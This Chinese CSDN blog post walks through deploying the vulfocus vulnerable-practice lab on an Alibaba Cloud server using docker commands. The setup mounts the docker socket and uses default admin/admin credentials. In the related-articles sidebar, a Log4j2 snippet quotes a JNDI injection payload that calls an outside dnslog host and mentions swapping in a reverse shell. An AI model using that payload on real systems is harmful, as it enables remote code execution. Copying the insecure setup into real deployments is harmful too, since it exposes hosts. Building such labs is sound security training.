阿里云服务器快速搭建vulfocus云靶场

已于 2023-08-20 14:12:39 修改
阅读量818 收藏 9
点赞数 4
分类专栏: 网络安全 文章标签: 阿里云 云计算
于 2023-08-19 20:06:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/y8868968/article/details/132381214
版权

前言

       本地搭建的vulfocus靶场存在无法拉取镜像类报错,可以通过云服务器搭建vulfocus靶场的方式保证靶场流畅运行。是否购买云服器取决于自身学习需要,单纯为了搭建靶场的话个人不建议专程购置云服务器。

一、服务器配置

​1.选择云服务器ECS或轻量应用服务器,2核4G就够用了,具体配置看个人需求

2.点击服务器列表-远程连接模块

       查看服务器ip地址并配置好远程连接用户的账号密码,使用Xshell通过22端口远程连接。 ​

连接成功后即可使用docker命令搭建靶场

二、靶场搭建 

1.首先更新一下APT

如果服务器镜像选的是docker的话,可以直接从第4步开始。

apt-get update

2.安装https协议、CA证书

 apt-get install -y apt-transport-https ca-certificates

 3.安装docker

apt install docker.io

 

4.使用docker命令加载vulfocus靶场镜像(服务器镜像选的是docker则可以直接从这一步开始)

docker pull vulfocus/vulfocus

 

5.查看一下镜像ID

docker images

 

6.连接靶场镜像,启动靶场即可

       IP地址就是云服务器的ip,我们这里用10.100.1.1举例,执行这一段代码的时候需要换成自己的云服务器ip。ID就是我们上一步骤所查看的id
docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e 10.100.1.1 8e55f85571c8

 

7.以上步骤完成后,访问云服务器IP地址

使用默认的账户登录: admin admin

三 、靶场使用

 1.vulfocus 是一个在线的漏洞靶场

        图形化操作界面使用起来更加方便,其本质上是一个漏洞集成平台,里面集成了大量的CVE漏洞环境,采用docker环境部署安装,可作为一个优秀靶场环境,提升实战能力。支持本地部署安装也可以直接使用线上环境。

2.镜像下载完毕后,点击启动,通过靶场开放端口访问即可  

薄酒清欢
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
网安靶场系列:手把手教你如何搭建vulfocus靶场
weixin_54626591的博客
03-14 116
手把手教你如何搭建vulfocus靶场
部署-阿里云服务器搭建靶机教程-2020.8.18.docx
08-24
在1阿里云服务器搭建vulhub靶场详细教程,如果按照教程操作不来,可以私信我,有不懂的问题也可以私信我
详解 Vulhub 靶场搭建
06-12
手把手教你vulhub搭建命令和过程
webgoat靶场需要自行搭建
01-19
webgoat靶场需要自行搭建
vulfocus靶场搭建
Elite的博客
02-21 1088
Vulfocus 是一个漏洞集成平台,将漏洞环境 docker 镜像,放入即可使用,开箱即用,我们可以通过搭建靶场,简单方便地复现一些框架组件漏洞。
靶场vulfocus搭建和场景编排
信安是不可或缺的一部分!
05-30 2162
构建的场景中的主要选一下比较新的漏洞,不然会出现横向移动很麻烦,还有一些漏洞需要回显,可能就会出现一些问题导致无法无法成功,建议场景搭建好后测试一下可行性,因为是docker可能会有一些命令无法使用,这也会造成一些困难。
插件分享 | Vulfocus 快速启动靶场环境一键打靶
m0_46699477的博客
12-01 6220
作为安全小白的插件作者,曾经最困惑的就是,拿着自带强大靶标漏洞库的 Goby 去扫描,却总是很难找到漏洞的影子,这让起步去学习安全知识这件事变得困难,后来了解到靶场工具,开始使用 Vulfocus,一个想法随之产生:将 Vulfocus 通过插件的方式集成到 Goby,更方便快捷的一键启动漏洞环境一键扫描漏洞。于是现在的这款插件应运而生~
vulfocus靶场搭建
qq_68890680的博客
06-23 907
docker exec -it 容器ID /bin/bash。docker start/stop/rm 容器ID。#开启/停止/删除docker指定容器。#查看正在运行的docker容器。#设置docker开机自启动。#删除已停止docker容器。#查看docker镜像列表。#查看所有docker容器。#删除所有docker容器。清理缓存且生成新缓存。查看docker版本。#docker帮助命令。#查看docker版本。#查看docker状态。#开启docker容器。#停止docker容器。
vulfocus靶场搭建(docker环境)
cute_phoebe的博客
06-22 7085
vulfocus涵盖众多类型的漏洞,是个练手的好地方
本地搭建vulfocus靶场&复现log4j2漏洞
xhscxj的博客
09-10 1811
环境用的是linux下的centos1.首先需要在centos中安装docker环境3.下载vulfocus镜像4.映射到centos中5.完成后访问centos的ip即可。
vulfocus靶场搭建(实测)
m0_50406447的博客
07-28 3万+
vulfocus的特性 1.启动:一键漏洞环境启动,方便简单。 2.自带 Flag 功能:每次启动 flag 都会自动更新,明确漏洞是否利用成功。 3.带有计分功能也可适用于相关安全人员能力的考核。 4.兼容 Vulhub、Vulapps 中所有漏洞镜像。 一、使用centos7作为靶机环境 1.挂载镜像 mkdir /mnt/cdrom:创建挂载点 mount /dev/cdrom /mnt/cdrom:镜像挂载 注意:这个必须已连接,否则镜像挂载失败 2.配置yum源 (1)进入y
Docker简单搭建Vulfocus靶场 CN-SEC 中文网.pdf
02-07
Docker简单搭建Vulfocus靶场 CN-SEC 中文网.pdf
网络安全、渗透测试靶场全集
qq_37776764的博客
04-26 790
writeup文章:https://github.com/niudaii/my-vulstack-wp。封神台 - 掌控安全在线攻防演练靶场,一个专为网络安全从业人员设计的白帽黑客渗透测试演练平台。武汉安鸾学院 – 武汉网络安全培训-渗透测试培训-Web安全培训。在线演示: http://vulfocus.fofa.so/10.python2的常见漏洞靶场(python2)LFI-labs 和本地文件包后漏洞利用靶场。Sqli-Labs:(sql注入靶场)3.韩国Webhacking。
Apache Log4j2 Vulfocus靶场环境复现
Aevery的博客
12-12 3528
Vulfocus在线靶场免费注册免费使用。在线地址: vulfocus 点击启动环境 启动后访问页面显示地地址,能成功访问即完成搭建完成 这里使用chrome的HackBar插件,直接使用POST协议随便传个参数上去访问hello页面 直接在Body插入payload,这里使用dnslog payload="${jndi:ldap://asr17t.dnslog.cn/exp}" 成功打印出dnslog信息 反弹shell替换payload即可 PS:...
Joker零安全手把手教你如何搭建vulfocus靶场
读书 买花 长大
05-28 1664
vulfocus
JavaScript学习--splice()函数详解
热门推荐
xian的博客
09-07 16万+
splice()函数详解 splice() 方法向/从数组中添加/删除项目,然后返回被删除的项目。 注释:该方法会改变原始数组。 参数: index —— 必需。整数,规定添加/删除项目的位置,使用负数可从数组结尾处规定位置。 howmany —— 必需。要删除的项目数量。如果设置为 0,则不会删除项目。 item1, …, itemX —— 可选。向数组添加的新项目。 返回值 Array —— 包含被删除项目的新数组,如果有的话。 一、情况一 示例:pandas 是基于NumPy 的
插件分享 Vulfocus 快速启动靶场环境一键打靶_vulfocus在线靶场
最新发布
m0_55030688的博客
04-12 421
首先进入插件,需要配置 Vulfocus 账号名和 License 值。LocalVulAddress 为本地漏洞环境的地址,注意应该确保 LocalVulAddress 的格式为 http://ip:port 的形式,UsernameLocal 为本地漏洞环境的账户名,LicenseLocal 为本地漏洞环境的 License 值。若没有本地漏洞环境则只需填写 Username 和 License,无需填写后三项配置项。
本地搭建vulfocus靶场
07-27
要在本地搭建VulFocus靶场,您可以按照以下步骤进行操作: 1. 首先,您需要确保您的系统已经安装了Docker和Docker Compose。您可以在官方网站上找到适用于您系统的安装指南。 2. 下载VulFocus的源代码。您可以在VulFocus的GitHub存储库中找到源代码:https://github.com/fofapro/vulfocus 3. 打开终端或命令提示符,并导航到下载的源代码目录。 4. 在命令提示符下运行以下命令,以构建并启动VulFocus靶场: ``` docker-compose up -d ``` 这将使用Docker Compose根据docker-compose.yml文件中的配置构建并启动VulFocus的各个组件。 5. 等待一段时间,直到所有组件都成功启动。您可以使用以下命令检查容器的状态: ``` docker-compose ps ``` 如果所有容器都处于“Up”状态,则说明VulFocus已成功部署。 6. 现在,您可以通过浏览器访问VulFocus的前端界面。默认情况下,它将在http://localhost:8080上运行。只需在浏览器中输入此URL,并按照界面上的指示进行操作。 请注意,这只是一个简单的搭建过程指南。要根据您的需求进行更详细的配置和定制,您可以参考VulFocus的文档或相关社区资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值